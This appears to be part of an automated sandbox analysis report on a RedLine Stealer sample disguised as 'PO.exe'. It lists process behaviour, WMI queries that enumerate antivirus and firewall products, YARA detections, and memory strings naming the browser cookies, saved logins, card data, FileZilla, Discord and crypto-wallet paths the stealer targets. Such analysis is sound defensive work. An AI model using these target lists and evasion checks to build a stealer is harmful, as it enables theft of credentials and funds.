Code function: 0_2_0018D05E cpuid

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_0018B2FE GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_00175032 GetVersionExW,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: PO.exe, 0000000E.00000002.2275317622.00000000013F5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AJzHYZtQIb.exe PID: 5404, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where 